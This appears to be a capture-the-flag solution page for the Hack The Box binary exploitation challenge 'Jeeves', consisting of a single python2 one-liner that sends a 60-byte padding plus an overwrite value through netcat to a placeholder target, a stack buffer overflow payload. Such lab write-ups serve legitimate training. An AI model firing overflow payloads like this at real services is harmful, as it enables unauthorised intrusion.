Skip to content

Jeeves

🏷 pwn

Intro to Binary Exploitation htb-pwn python2


Jeeves.zip
🔑 hackthebox

Solution

python2 -c "print 'a'*60+'\xb3\xba\x37\x13'" | nc <target_ip> <port>